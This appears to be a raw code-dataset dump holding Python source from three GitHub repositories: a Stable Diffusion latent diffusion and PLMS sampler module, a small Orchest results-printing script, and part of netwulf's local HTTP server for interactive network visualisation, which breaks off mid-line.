loss_dict\n\n def forward(self, x, *args, **kwargs):\n # b, c, h, w, device, img_size, = *x.shape, x.device, self.image_size\n # assert h == img_size and w == img_size, f'height and width of image must be {img_size}'\n t = torch.randint(\n 0, self.num_timesteps, (x.shape[0],), device=self.device\n ).long()\n return self.p_losses(x, t, *args, **kwargs)\n\n def get_input(self, batch, k):\n x = batch[k]\n if len(x.shape) == 3:\n x = x[..., None]\n x = rearrange(x, \"b h w c -> b c h w\")\n x = x.to(memory_format=torch.contiguous_format).float()\n return x\n\n\nclass LatentDiffusion(DDPM):\n \"\"\"main class\"\"\"\n\n def __init__(\n self,\n autoencoder,\n clipembedder,\n num_timesteps_cond=None,\n cond_stage_key=\"image\",\n cond_stage_trainable=False,\n concat_mode=True,\n cond_stage_forward=None,\n scale_factor=1.0,\n scale_by_std=False,\n device: str = \"cuda\",\n **kwargs,\n ):\n self.num_timesteps_cond = default(num_timesteps_cond, 1)\n self.scale_by_std = scale_by_std\n ckpt_path = kwargs.pop(\"ckpt_path\", None)\n ignore_keys = kwargs.pop(\"ignore_keys\", [])\n super().__init__(**kwargs)\n self.concat_mode = concat_mode\n self.cond_stage_trainable = cond_stage_trainable\n self.cond_stage_key = cond_stage_key\n self.first_stage_model = autoencoder\n self.cond_stage_model = clipembedder\n self.device = device\n if not scale_by_std:\n self.scale_factor = scale_factor\n else:\n self.register_buffer(\"scale_factor\", torch.tensor(scale_factor))\n self.cond_stage_forward = cond_stage_forward\n self.clip_denoised = False\n self.bbox_tokenizer = None\n\n self.restarted_from_ckpt = False\n if ckpt_path is not None:\n self.init_from_ckpt(ckpt_path, ignore_keys)\n self.restarted_from_ckpt = True\n\n def make_cond_schedule(\n self,\n ):\n self.cond_ids = torch.full(\n size=(self.num_timesteps,),\n fill_value=self.num_timesteps - 1,\n dtype=torch.long,\n )\n ids = torch.round(\n torch.linspace(0, self.num_timesteps - 1, self.num_timesteps_cond)\n ).long()\n self.cond_ids[: self.num_timesteps_cond] = ids\n\n def register_schedule(\n self,\n given_betas=None,\n beta_schedule=\"linear\",\n timesteps=1000,\n linear_start=1e-4,\n linear_end=2e-2,\n cosine_s=8e-3,\n ):\n super().register_schedule(\n given_betas, beta_schedule, timesteps, linear_start, linear_end, cosine_s\n )\n\n self.shorten_cond_schedule = self.num_timesteps_cond > 1\n if self.shorten_cond_schedule:\n self.make_cond_schedule()\n\n def get_first_stage_encoding(self, encoder_posterior):\n if isinstance(encoder_posterior, DiagonalGaussianDistribution):\n z = encoder_posterior.sample()\n elif isinstance(encoder_posterior, torch.Tensor):\n z = encoder_posterior\n else:\n raise NotImplementedError(\n f\"encoder_posterior of type '{type(encoder_posterior)}' not yet implemented\"\n )\n return self.scale_factor * z\n\n def get_learned_conditioning(self, c):\n if self.cond_stage_forward is None:\n if hasattr(self.cond_stage_model, \"encode\") and callable(\n self.cond_stage_model.encode\n ):\n c = self.cond_stage_model.encode(c)\n if isinstance(c, DiagonalGaussianDistribution):\n c = c.mode()\n else:\n c = self.cond_stage_model(c)\n else:\n assert hasattr(self.cond_stage_model, self.cond_stage_forward)\n c = getattr(self.cond_stage_model, self.cond_stage_forward)(c)\n return c\n\n def meshgrid(self, h, w):\n y = torch.arange(0, h).view(h, 1, 1).repeat(1, w, 1)\n x = torch.arange(0, w).view(1, w, 1).repeat(h, 1, 1)\n\n arr = torch.cat([y, x], dim=-1)\n return arr\n\n def delta_border(self, h, w):\n \"\"\"\n :param h: height\n :param w: width\n :return: normalized distance to image border,\n wtith min distance = 0 at border and max dist = 0.5 at image center\n \"\"\"\n lower_right_corner = torch.tensor([h - 1, w - 1]).view(1, 1, 2)\n arr = self.meshgrid(h, w) / lower_right_corner\n dist_left_up = torch.min(arr, dim=-1, keepdims=True)[0]\n dist_right_down = torch.min(1 - arr, dim=-1, keepdims=True)[0]\n edge_dist = torch.min(\n torch.cat([dist_left_up, dist_right_down], dim=-1), dim=-1\n )[0]\n return edge_dist\n\n @torch.no_grad()\n def decode_first_stage(self, z, predict_cids=False, force_not_quantize=False):\n if predict_cids:\n if z.dim() == 4:\n z = torch.argmax(z.exp(), dim=1).long()\n z = self.first_stage_model.quantize.get_codebook_entry(z, shape=None)\n z = rearrange(z, \"b h w c -> b c h w\").contiguous()\n\n z = 1.0 / self.scale_factor * z\n\n if hasattr(self, \"split_input_params\"):\n if self.split_input_params[\"patch_distributed_vq\"]:\n ks = self.split_input_params[\"ks\"] # eg. (128, 128)\n stride = self.split_input_params[\"stride\"] # eg. (64, 64)\n uf = self.split_input_params[\"vqf\"]\n bs, nc, h, w = z.shape\n if ks[0] > h or ks[1] > w:\n ks = (min(ks[0], h), min(ks[1], w))\n print(\"reducing Kernel\")\n\n if stride[0] > h or stride[1] > w:\n stride = (min(stride[0], h), min(stride[1], w))\n print(\"reducing stride\")\n\n fold, unfold, normalization, weighting = self.get_fold_unfold(\n z, ks, stride, uf=uf\n )\n\n z = unfold(z) # (bn, nc * prod(**ks), L)\n\n # 1. Reshape to img shape\n z = z.view(\n (z.shape[0], -1, ks[0], ks[1], z.shape[-1])\n ) # (bn, nc, ks[0], ks[1], L )\n\n # 2. apply model loop over last dim\n output_list = [\n self.first_stage_model.decode(z[:, :, :, :, i])\n for i in range(z.shape[-1])\n ]\n\n o = torch.stack(output_list, axis=-1) # # (bn, nc, ks[0], ks[1], L)\n o = o * weighting\n # Reverse 1. reshape to img shape\n o = o.view((o.shape[0], -1, o.shape[-1])) # (bn, nc * ks[0] * ks[1], L)\n # stitch crops together\n decoded = fold(o)\n decoded = decoded / normalization # norm is shape (1, 1, h, w)\n return decoded\n else:\n return self.first_stage_model.decode(z)\n\n else:\n return self.first_stage_model.decode(z)\n\n # same as above but without decorator\n def differentiable_decode_first_stage(\n self, z, predict_cids=False, force_not_quantize=False\n ):\n if predict_cids:\n if z.dim() == 4:\n z = torch.argmax(z.exp(), dim=1).long()\n z = self.first_stage_model.quantize.get_codebook_entry(z, shape=None)\n z = rearrange(z, \"b h w c -> b c h w\").contiguous()\n\n z = 1.0 / self.scale_factor * z\n\n return self.first_stage_model.decode(z)\n\n @torch.no_grad()\n def encode_first_stage(self, x):\n return self.first_stage_model.encode(x)\n\n def shared_step(self, batch, **kwargs):\n x, c = self.get_input(batch, self.first_stage_key)\n loss = self(x, c)\n return loss\n\n def forward(self, x, c, *args, **kwargs):\n t = torch.randint(\n 0, self.num_timesteps, (x.shape[0],), device=self.device\n ).long()\n assert c is not None\n if self.cond_stage_trainable:\n c = self.get_learned_conditioning(c)\n if self.shorten_cond_schedule: # TODO: drop this option\n tc = self.cond_ids[t].to(self.device)\n c = self.q_sample(x_start=c, t=tc, noise=torch.randn_like(c.float()))\n\n return self.p_losses(x, c, t, *args, **kwargs)\n\n def _prior_bpd(self, x_start):\n \"\"\"\n Get the prior KL term for the variational lower-bound, measured in\n bits-per-dim.\n This term can't be optimized, as it only depends on the encoder.\n :param x_start: the [N x C x ...] tensor of inputs.\n :return: a batch of [N] KL values (in bits), one per batch element.\n \"\"\"\n batch_size = x_start.shape[0]\n t = torch.tensor([self.num_timesteps - 1] * batch_size, device=x_start.device)\n qt_mean, _, qt_log_variance = self.q_mean_variance(x_start, t)\n kl_prior = normal_kl(\n mean1=qt_mean, logvar1=qt_log_variance, mean2=0.0, logvar2=0.0\n )\n return mean_flat(kl_prior) / np.log(2.0)\n\n def p_losses(self, x_start, cond, t, noise=None):\n noise = default(noise, lambda: torch.randn_like(x_start))\n x_noisy = self.q_sample(x_start=x_start, t=t, noise=noise)\n model_output = self.model(x_noisy, t, [cond])\n\n loss_dict = {}\n prefix = \"train\" if self.training else \"val\"\n\n if self.parameterization == \"x0\":\n target = x_start\n elif self.parameterization == \"eps\":\n target = noise\n else:\n raise NotImplementedError()\n\n loss_simple = self.get_loss(model_output, target, mean=False).mean([1, 2, 3])\n loss_dict.update({f\"{prefix}/loss_simple\": loss_simple.mean()})\n\n logvar_t = self.logvar[t].to(self.device)\n loss = loss_simple / torch.exp(logvar_t) + logvar_t\n # loss = loss_simple / torch.exp(self.logvar) + self.logvar\n if self.learn_logvar:\n loss_dict.update({f\"{prefix}/loss_gamma\": loss.mean()})\n loss_dict.update({\"logvar\": self.logvar.data.mean()})\n\n loss = self.l_simple_weight * loss.mean()\n\n loss_vlb = self.get_loss(model_output, target, mean=False).mean(dim=(1, 2, 3))\n loss_vlb = (self.lvlb_weights[t] * loss_vlb).mean()\n loss_dict.update({f\"{prefix}/loss_vlb\": loss_vlb})\n loss += self.original_elbo_weight * loss_vlb\n loss_dict.update({f\"{prefix}/loss\": loss})\n\n return loss, loss_dict\n\n def p_mean_variance(\n self,\n x,\n c,\n t,\n clip_denoised: bool,\n quantize_denoised=False,\n return_x0=False,\n score_corrector=None,\n corrector_kwargs=None,\n ):\n t_in = t\n model_out = self.model(x, t_in, c)[0]\n\n if score_corrector is not None:\n assert self.parameterization == \"eps\"\n model_out = score_corrector.modify_score(\n self, model_out, x, t, c, **corrector_kwargs\n )\n\n if self.parameterization == \"eps\":\n x_recon = self.predict_start_from_noise(x, t=t, noise=model_out)\n elif self.parameterization == \"x0\":\n x_recon = model_out\n else:\n raise NotImplementedError()\n\n if clip_denoised:\n x_recon.clamp_(-1.0, 1.0)\n if quantize_denoised:\n x_recon, _, [_, _, indices] = self.first_stage_model.quantize(x_recon)\n model_mean, posterior_variance, posterior_log_variance = self.q_posterior(\n x_start=x_recon, x_t=x, t=t\n )\n if return_x0:\n return model_mean, posterior_variance, posterior_log_variance, x_recon\n else:\n return model_mean, posterior_variance, posterior_log_variance\n\n @torch.no_grad()\n def p_sample(\n self,\n x,\n c,\n t,\n clip_denoised=False,\n repeat_noise=False,\n quantize_denoised=False,\n return_x0=False,\n temperature=1.0,\n noise_dropout=0.0,\n score_corrector=None,\n corrector_kwargs=None,\n ):\n b, *_, device = *x.shape, x.device\n outputs = self.p_mean_variance(\n x=x,\n c=c,\n t=t,\n clip_denoised=clip_denoised,\n quantize_denoised=quantize_denoised,\n return_x0=return_x0,\n score_corrector=score_corrector,\n corrector_kwargs=corrector_kwargs,\n )\n if return_x0:\n model_mean, _, model_log_variance, x0 = outputs\n else:\n model_mean, _, model_log_variance = outputs\n\n noise = noise_like(x.shape, device, repeat_noise) * temperature\n if noise_dropout > 0.0:\n noise = torch.nn.functional.dropout(noise, p=noise_dropout)\n # no noise when t == 0\n nonzero_mask = (1 - (t == 0).float()).reshape(b, *((1,) * (len(x.shape) - 1)))\n\n if return_x0:\n return (\n model_mean + nonzero_mask * (0.5 * model_log_variance).exp() * noise,\n x0,\n )\n else:\n return model_mean + nonzero_mask * (0.5 * model_log_variance).exp() * noise\n\n @torch.no_grad()\n def progressive_denoising(\n self,\n cond,\n shape,\n callback=None,\n quantize_denoised=False,\n img_callback=None,\n mask=None,\n x0=None,\n temperature=1.0,\n noise_dropout=0.0,\n score_corrector=None,\n corrector_kwargs=None,\n batch_size=None,\n x_T=None,\n start_T=None,\n log_every_t=None,\n ):\n if not log_every_t:\n log_every_t = self.log_every_t\n timesteps = self.num_timesteps\n if batch_size is not None:\n b = batch_size if batch_size is not None else shape[0]\n shape = [batch_size] + list(shape)\n else:\n b = batch_size = shape[0]\n if x_T is None:\n img = torch.randn(shape, device=self.device)\n else:\n img = x_T\n intermediates = []\n if cond is not None:\n if isinstance(cond, dict):\n cond = {\n key: cond[key][:batch_size]\n if not isinstance(cond[key], list)\n else list(map(lambda x: x[:batch_size], cond[key]))\n for key in cond\n }\n else:\n cond = (\n [c[:batch_size] for c in cond]\n if isinstance(cond, list)\n else cond[:batch_size]\n )\n\n if start_T is not None:\n timesteps = min(timesteps, start_T)\n iterator = tqdm(\n reversed(range(0, timesteps)),\n desc=\"Progressive Generation\",\n total=timesteps,\n )\n if type(temperature) == float:\n temperature = [temperature] * timesteps\n\n for i in iterator:\n ts = torch.full((b,), i, device=self.device, dtype=torch.long)\n if self.shorten_cond_schedule:\n assert self.model.conditioning_key != \"hybrid\"\n tc = self.cond_ids[ts].to(cond.device)\n cond = self.q_sample(x_start=cond, t=tc, noise=torch.randn_like(cond))\n\n img, x0_partial = self.p_sample(\n img,\n cond,\n ts,\n clip_denoised=self.clip_denoised,\n quantize_denoised=quantize_denoised,\n return_x0=True,\n temperature=temperature[i],\n noise_dropout=noise_dropout,\n score_corrector=score_corrector,\n corrector_kwargs=corrector_kwargs,\n )\n if mask is not None:\n assert x0 is not None\n img_orig = self.q_sample(x0, ts)\n img = img_orig * mask + (1.0 - mask) * img\n\n if i % log_every_t == 0 or i == timesteps - 1:\n intermediates.append(x0_partial)\n if callback:\n callback(i)\n if img_callback:\n img_callback(img, i)\n return img, intermediates\n\n @torch.no_grad()\n def p_sample_loop(\n self,\n cond,\n shape,\n return_intermediates=False,\n x_T=None,\n callback=None,\n timesteps=None,\n quantize_denoised=False,\n mask=None,\n x0=None,\n img_callback=None,\n start_T=None,\n log_every_t=None,\n ):\n\n if not log_every_t:\n log_every_t = self.log_every_t\n device = self.betas.device\n b = shape[0]\n if x_T is None:\n img = torch.randn(shape, device=device)\n else:\n img = x_T\n\n intermediates = [img]\n if timesteps is None:\n timesteps = self.num_timesteps\n\n if start_T is not None:\n timesteps = min(timesteps, start_T)\n iterator = tqdm(\n reversed(range(0, timesteps)), desc=\"Sampling t\", total=timesteps\n )\n\n if mask is not None:\n assert x0 is not None\n assert x0.shape[2:3] == mask.shape[2:3] # spatial size has to match\n\n for i in iterator:\n ts = torch.full((b,), i, device=device, dtype=torch.long)\n if self.shorten_cond_schedule:\n assert self.model.conditioning_key != \"hybrid\"\n tc = self.cond_ids[ts].to(cond.device)\n cond = self.q_sample(x_start=cond, t=tc, noise=torch.randn_like(cond))\n\n img = self.p_sample(\n img,\n cond,\n ts,\n clip_denoised=self.clip_denoised,\n quantize_denoised=quantize_denoised,\n )\n if mask is not None:\n img_orig = self.q_sample(x0, ts)\n img = img_orig * mask + (1.0 - mask) * img\n\n if i % log_every_t == 0 or i == timesteps - 1:\n intermediates.append(img)\n if callback:\n callback(i)\n if img_callback:\n img_callback(img, i)\n\n if return_intermediates:\n return img, intermediates\n return img\n\n @torch.no_grad()\n def sample(\n self,\n cond,\n batch_size=16,\n return_intermediates=False,\n x_T=None,\n timesteps=None,\n quantize_denoised=False,\n mask=None,\n x0=None,\n shape=None,\n **kwargs,\n ):\n if shape is None:\n shape = (batch_size, self.channels, self.image_size, self.image_size)\n if cond is not None:\n if isinstance(cond, dict):\n cond = {\n key: cond[key][:batch_size]\n if not isinstance(cond[key], list)\n else list(map(lambda x: x[:batch_size], cond[key]))\n for key in cond\n }\n else:\n cond = (\n [c[:batch_size] for c in cond]\n if isinstance(cond, list)\n else cond[:batch_size]\n )\n return self.p_sample_loop(\n cond,\n shape,\n return_intermediates=return_intermediates,\n x_T=x_T,\n timesteps=timesteps,\n quantize_denoised=quantize_denoised,\n mask=mask,\n x0=x0,\n )\n\n @torch.no_grad()\n def to_rgb(self, x):\n x = x.float()\n if not hasattr(self, \"colorize\"):\n self.colorize = torch.randn(3, x.shape[1], 1, 1).to(x)\n x = nn.functional.conv2d(x, weight=self.colorize)\n x = 2.0 * (x - x.min()) / (x.max() - x.min()) - 1.0\n return x\n\n\nclass DiffusionWrapper(nn.Module):\n def __init__(self):\n super().__init__()\n self.diffusion_model = UNetModel()\n\n def forward(self, x, t, cond: list = None):\n out = self.diffusion_model(x, t, cond)\n return out\n\n\nclass PLMSSampler(object):\n def __init__(self, model, schedule=\"linear\", **kwargs):\n super().__init__()\n self.model = model\n self.ddpm_num_timesteps = model.num_timesteps\n self.schedule = schedule\n\n def register_buffer(self, name, attr):\n if type(attr) == torch.Tensor:\n if attr.device != torch.device(\"cuda\"):\n attr = attr.to(torch.device(\"cuda\"))\n setattr(self, name, attr)\n\n def make_schedule(self, ddim_num_steps, ddim_discretize=\"uniform\", ddim_eta=0.0):\n if ddim_eta != 0:\n raise ValueError(\"ddim_eta must be 0 for PLMS\")\n self.ddim_timesteps = make_ddim_timesteps(\n ddim_discr_method=ddim_discretize,\n num_ddim_timesteps=ddim_num_steps,\n num_ddpm_timesteps=self.ddpm_num_timesteps,\n )\n alphas_cumprod = self.model.alphas_cumprod\n assert (\n alphas_cumprod.shape[0] == self.ddpm_num_timesteps\n ), \"alphas have to be defined for each timestep\"\n to_torch = lambda x: x.clone().detach().to(torch.float32).to(self.model.device)\n\n self.register_buffer(\"betas\", to_torch(self.model.betas))\n self.register_buffer(\"alphas_cumprod\", to_torch(alphas_cumprod))\n self.register_buffer(\n \"alphas_cumprod_prev\", to_torch(self.model.alphas_cumprod_prev)\n )\n\n # calculations for diffusion q(x_t | x_{t-1}) and others\n self.register_buffer(\n \"sqrt_alphas_cumprod\", to_torch(np.sqrt(alphas_cumprod.cpu()))\n )\n self.register_buffer(\n \"sqrt_one_minus_alphas_cumprod\",\n to_torch(np.sqrt(1.0 - alphas_cumprod.cpu())),\n )\n self.register_buffer(\n \"log_one_minus_alphas_cumprod\", to_torch(np.log(1.0 - alphas_cumprod.cpu()))\n )\n self.register_buffer(\n \"sqrt_recip_alphas_cumprod\", to_torch(np.sqrt(1.0 / alphas_cumprod.cpu()))\n )\n self.register_buffer(\n \"sqrt_recipm1_alphas_cumprod\",\n to_torch(np.sqrt(1.0 / alphas_cumprod.cpu() - 1)),\n )\n\n # ddim sampling parameters\n ddim_sigmas, ddim_alphas, ddim_alphas_prev = make_ddim_sampling_parameters(\n alphacums=alphas_cumprod.cpu(),\n ddim_timesteps=self.ddim_timesteps,\n eta=ddim_eta,\n )\n self.register_buffer(\"ddim_sigmas\", ddim_sigmas)\n self.register_buffer(\"ddim_alphas\", ddim_alphas)\n self.register_buffer(\"ddim_alphas_prev\", ddim_alphas_prev)\n self.register_buffer(\"ddim_sqrt_one_minus_alphas\", np.sqrt(1.0 - ddim_alphas))\n sigmas_for_original_sampling_steps = ddim_eta * torch.sqrt(\n (1 - self.alphas_cumprod_prev)\n / (1 - self.alphas_cumprod)\n * (1 - self.alphas_cumprod / self.alphas_cumprod_prev)\n )\n self.register_buffer(\n \"ddim_sigmas_for_original_num_steps\", sigmas_for_original_sampling_steps\n )\n\n @torch.no_grad()\n def sample(\n self,\n S,\n batch_size,\n shape,\n conditioning=None,\n callback=None,\n normals_sequence=None,\n img_callback=None,\n quantize_x0=False,\n eta=0.0,\n mask=None,\n x0=None,\n temperature=1.0,\n noise_dropout=0.0,\n score_corrector=None,\n corrector_kwargs=None,\n x_T=None,\n log_every_t=100,\n unconditional_guidance_scale=1.0,\n unconditional_conditioning=None,\n ):\n if conditioning is not None:\n if isinstance(conditioning, dict):\n cbs = conditioning[list(conditioning.keys())[0]].shape[0]\n if cbs != batch_size:\n print(\n f\"Warning: Got {cbs} conditionings but batch-size is {batch_size}\"\n )\n else:\n if conditioning.shape[0] != batch_size:\n print(\n f\"Warning: Got {conditioning.shape[0]} conditionings but batch-size is {batch_size}\"\n )\n\n self.make_schedule(ddim_num_steps=S, ddim_eta=eta)\n # sampling\n C, H, W = shape\n size = (batch_size, C, H, W)\n print(f\"Data shape for PLMS sampling is {size}\")\n\n samples, intermediates = self.plms_sampling(\n conditioning,\n size,\n callback=callback,\n img_callback=img_callback,\n quantize_denoised=quantize_x0,\n mask=mask,\n x0=x0,\n ddim_use_original_steps=False,\n noise_dropout=noise_dropout,\n temperature=temperature,\n score_corrector=score_corrector,\n corrector_kwargs=corrector_kwargs,\n x_T=x_T,\n log_every_t=log_every_t,\n unconditional_guidance_scale=unconditional_guidance_scale,\n unconditional_conditioning=unconditional_conditioning,\n )\n return samples, intermediates\n\n @torch.no_grad()\n def plms_sampling(\n self,\n cond,\n shape,\n x_T=None,\n ddim_use_original_steps=False,\n callback=None,\n timesteps=None,\n quantize_denoised=False,\n mask=None,\n x0=None,\n img_callback=None,\n log_every_t=100,\n temperature=1.0,\n noise_dropout=0.0,\n score_corrector=None,\n corrector_kwargs=None,\n unconditional_guidance_scale=1.0,\n unconditional_conditioning=None,\n ):\n device = self.model.betas.device\n b = shape[0]\n if x_T is None:\n img = torch.randn(shape, device=device)\n else:\n img = x_T\n\n if timesteps is None:\n timesteps = (\n self.ddpm_num_timesteps\n if ddim_use_original_steps\n else self.ddim_timesteps\n )\n elif timesteps is not None and not ddim_use_original_steps:\n subset_end = (\n int(\n min(timesteps / self.ddim_timesteps.shape[0], 1)\n * self.ddim_timesteps.shape[0]\n )\n - 1\n )\n timesteps = self.ddim_timesteps[:subset_end]\n\n intermediates = {\"x_inter\": [img], \"pred_x0\": [img]}\n time_range = (\n list(reversed(range(0, timesteps)))\n if ddim_use_original_steps\n else np.flip(timesteps)\n )\n total_steps = timesteps if ddim_use_original_steps else timesteps.shape[0]\n print(f\"Running PLMS Sampling with {total_steps} timesteps\")\n\n iterator = tqdm(time_range, desc=\"PLMS Sampler\", total=total_steps)\n old_eps = []\n\n for i, step in enumerate(iterator):\n index = total_steps - i - 1\n ts = torch.full((b,), step, device=device, dtype=torch.long)\n ts_next = torch.full(\n (b,),\n time_range[min(i + 1, len(time_range) - 1)],\n device=device,\n dtype=torch.long,\n )\n\n if mask is not None:\n assert x0 is not None\n img_orig = self.model.q_sample(\n x0, ts\n ) # TODO: deterministic forward pass?\n img = img_orig * mask + (1.0 - mask) * img\n\n outs = self.p_sample_plms(\n img,\n cond,\n ts,\n index=index,\n use_original_steps=ddim_use_original_steps,\n quantize_denoised=quantize_denoised,\n temperature=temperature,\n noise_dropout=noise_dropout,\n score_corrector=score_corrector,\n corrector_kwargs=corrector_kwargs,\n unconditional_guidance_scale=unconditional_guidance_scale,\n unconditional_conditioning=unconditional_conditioning,\n old_eps=old_eps,\n t_next=ts_next,\n )\n img, pred_x0, e_t = outs\n old_eps.append(e_t)\n if len(old_eps) >= 4:\n old_eps.pop(0)\n if callback:\n callback(i)\n if img_callback:\n img_callback(pred_x0, i)\n\n if index % log_every_t == 0 or index == total_steps - 1:\n intermediates[\"x_inter\"].append(img)\n intermediates[\"pred_x0\"].append(pred_x0)\n\n return img, intermediates\n\n @torch.no_grad()\n def p_sample_plms(\n self,\n x,\n c,\n t,\n index,\n repeat_noise=False,\n use_original_steps=False,\n quantize_denoised=False,\n temperature=1.0,\n noise_dropout=0.0,\n score_corrector=None,\n corrector_kwargs=None,\n unconditional_guidance_scale=1.0,\n unconditional_conditioning=None,\n old_eps=None,\n t_next=None,\n ):\n b, *_, device = *x.shape, x.device\n\n def get_model_output(x, t):\n # e_t = self.model(x, t, [c])\n x_in = torch.cat([x] * 2)\n t_in = torch.cat([t] * 2)\n c_in = torch.cat([unconditional_conditioning, c])\n e_t_uncond, e_t = self.model.model(x_in, t_in, [c_in]).chunk(2)\n e_t = e_t_uncond + unconditional_guidance_scale * (e_t - e_t_uncond)\n\n if score_corrector is not None:\n assert self.model.parameterization == \"eps\"\n e_t = score_corrector.modify_score(\n self.model, e_t, x, t, c, **corrector_kwargs\n )\n\n return e_t\n\n alphas = self.model.alphas_cumprod if use_original_steps else self.ddim_alphas\n alphas_prev = (\n self.model.alphas_cumprod_prev\n if use_original_steps\n else self.ddim_alphas_prev\n )\n sqrt_one_minus_alphas = (\n self.model.sqrt_one_minus_alphas_cumprod\n if use_original_steps\n else self.ddim_sqrt_one_minus_alphas\n )\n sigmas = (\n self.model.ddim_sigmas_for_original_num_steps\n if use_original_steps\n else self.ddim_sigmas\n )\n\n def get_x_prev_and_pred_x0(e_t, index):\n # select parameters corresponding to the currently considered timestep\n a_t = torch.full((b, 1, 1, 1), alphas[index], device=device)\n a_prev = torch.full((b, 1, 1, 1), alphas_prev[index], device=device)\n sigma_t = torch.full((b, 1, 1, 1), sigmas[index], device=device)\n sqrt_one_minus_at = torch.full(\n (b, 1, 1, 1), sqrt_one_minus_alphas[index], device=device\n )\n\n # current prediction for x_0\n pred_x0 = (x - sqrt_one_minus_at * e_t) / a_t.sqrt()\n if quantize_denoised:\n pred_x0, _, *_ = self.model.first_stage_model.quantize(pred_x0)\n # direction pointing to x_t\n dir_xt = (1.0 - a_prev - sigma_t**2).sqrt() * e_t\n noise = sigma_t * noise_like(x.shape, device, repeat_noise) * temperature\n if noise_dropout > 0.0:\n noise = torch.nn.functional.dropout(noise, p=noise_dropout)\n x_prev = a_prev.sqrt() * pred_x0 + dir_xt + noise\n return x_prev, pred_x0\n\n e_t = get_model_output(x, t)\n if len(old_eps) == 0:\n # Pseudo Improved Euler (2nd order)\n x_prev, pred_x0 = get_x_prev_and_pred_x0(e_t, index)\n e_t_next = get_model_output(x_prev, t_next)\n e_t_prime = (e_t + e_t_next) / 2\n elif len(old_eps) == 1:\n # 2nd order Pseudo Linear Multistep (Adams-Bashforth)\n e_t_prime = (3 * e_t - old_eps[-1]) / 2\n elif len(old_eps) == 2:\n # 3nd order Pseudo Linear Multistep (Adams-Bashforth)\n e_t_prime = (23 * e_t - 16 * old_eps[-1] + 5 * old_eps[-2]) / 12\n elif len(old_eps) >= 3:\n # 4nd order Pseudo Linear Multistep (Adams-Bashforth)\n e_t_prime = (\n 55 * e_t - 59 * old_eps[-1] + 37 * old_eps[-2] - 9 * old_eps[-3]\n ) / 24\n\n x_prev, pred_x0 = get_x_prev_and_pred_x0(e_t_prime, index)\n\n return x_prev, pred_x0, e_t\n","repo_name":"limiteinductive/tidy-stable-diffusion","sub_path":"tsd/sampling.py","file_name":"sampling.py","file_ext":"py","file_size_in_byte":47277,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"10199781931","text":"import orchest\nfrom deep_autoviml import print_classification_model_stats, print_regression_model_stats\n\n## just collect the results from various predictions of models\ndata1 = orchest.get_inputs()\n\n### print the results one by one ####\nfor name, value in data1.items():\n if name != \"unnamed\":\n modelname = name.split(\" \")[:-1]\n modeltype = name.split(\" \")[-1]\n print(f\"\\n{modelname} \")\n y_test, y_preds = value\n if modeltype == 'Regression':\n print_regression_model_stats(y_test, y_preds)\n else:\n print_classification_model_stats(y_test, y_preds)","repo_name":"rsesha/deep_autoviml_pipeline","sub_path":"display_results.py","file_name":"display_results.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"14072615406","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThis module provides the necessary functions to start up a local\nHTTP server and open an interactive d3-visualization of a network.\n\"\"\"\nfrom __future__ import print_function\n\nimport os\nimport sys\nimport simplejson as json\nfrom distutils.dir_util import copy_tree\nimport base64\nimport http.server\nimport webbrowser\nimport time\nimport threading\nfrom copy import deepcopy\nimport shutil\nfrom io import BytesIO\nimport pathlib\n\nimport numpy\n\nimport networkx as nx\nimport netwulf as wulf\n\nnetwulf_user_folder = pathlib.Path('~/.netwulf/').expanduser()\nhtml_source_path = (pathlib.Path(wulf.__path__[0]) / 'js').expanduser()\n\ndef _json_default(o):\n if isinstance(o, numpy.int64): return int(o)\n elif isinstance(o, numpy.float64): return float(o)\n raise TypeError\n\ndef mkdirp_customdir(directory=None):\n \"\"\"simulate `mkdir -p` functionality\"\"\"\n if directory is None:\n directory = netwulf_user_folder\n\n try:\n directory = pathlib.Path(directory).expanduser().resolve()\n except FileNotFoundError as e:\n directory = pathlib.Path(directory).expanduser() # Python 3.5 compliant\n\n directory.mkdir(parents=True, exist_ok=True)\n\ndef prepare_visualization_directory():\n \"\"\"Move all files from the netwulf/js directory to ~/.netwulf\"\"\"\n src = html_source_path\n dst = netwulf_user_folder\n\n # always copy source files to the subdirectory\n copy_tree(str(src), str(dst))\n\nclass NetwulfHTTPServer(http.server.HTTPServer):\n \"\"\"Custom netwulf server class adapted from \n https://stackoverflow.com/questions/268629/how-to-stop-basehttpserver-serve-forever-in-a-basehttprequesthandler-subclass \"\"\"\n\n # The handler will write in this attribute\n posted_network_properties = None\n posted_config = None\n posted_image_base64 = None\n \n end_requested = False\n\n def __init__(self, server_address, handler, subjson, verbose=False):\n http.server.HTTPServer.__init__(self, server_address, handler)\n self.subjson = subjson\n self.verbose = verbose\n\n def run(self):\n try:\n self.serve_forever()\n except OSError:\n pass\n\n def serve_forever(self):\n \"\"\"Handle one request at a time until doomsday.\"\"\"\n while not self.end_requested:\n self.handle_request()\n if self.verbose:\n print(\"serve_forever() terminated\")\n\n def stop_this(self):\n # Clean-up server (close socket, etc.)\n if self.verbose:\n print('was asked to stop the server')\n self.server_close()\n\n # try:\n for f in self.subjson:\n fPath = pathlib.Path(f)\n if fPath.exists():\n fPath.unlink()\n\n if self.verbose:\n print('deleted all files')\n\n\nclass NetwulfHTTPRequestHandler(http.server.SimpleHTTPRequestHandler):\n \"\"\"A custom handler class adapted from\n https://stackoverflow.com/questions/6204029/extending-basehttprequesthandler-getting-the-posted-data\n and\n https://blog.anvileight.com/posts/simple-python-http-server/#do-post\n \"\"\"\n\n def do_POST(self):\n content_length = int(self.headers['Content-Length'])\n\n # an empty POST means the server should be stopped\n if content_length == 0:\n try:\n body = self.rfile.read(content_length)\n self.send_response(200)\n self.end_headers()\n response = BytesIO()\n response.write(b'Closing now.')\n self.wfile.write(response.getvalue())\n except: #this should actually catch a ConnectionError for windows or firefox\n pass\n self.server.end_requested = True\n else:\n body = self.rfile.read(content_length)\n self.send_response(200)\n self.end_headers()\n response = BytesIO()\n response.write(b'Successful POST request.')\n self.wfile.write(response.getvalue())\n\n # Save this posted data to the server object so it can be retrieved later on\n if self.server.verbose:\n print(\"Successfully posted network data to Python!\")\n received_data = json.loads(body)\n self.server.posted_network_properties = received_data['network']\n self.server.posted_config = received_data['config']\n img = received_data['image'].split(',')[1]\n self.server.posted_image_base64 = base64.decodebytes(img.encode())\n\n\n def log_message(self, format, *args):\n if self.server.verbose:\n print(self.address_string(), self.log_date_time_string(), 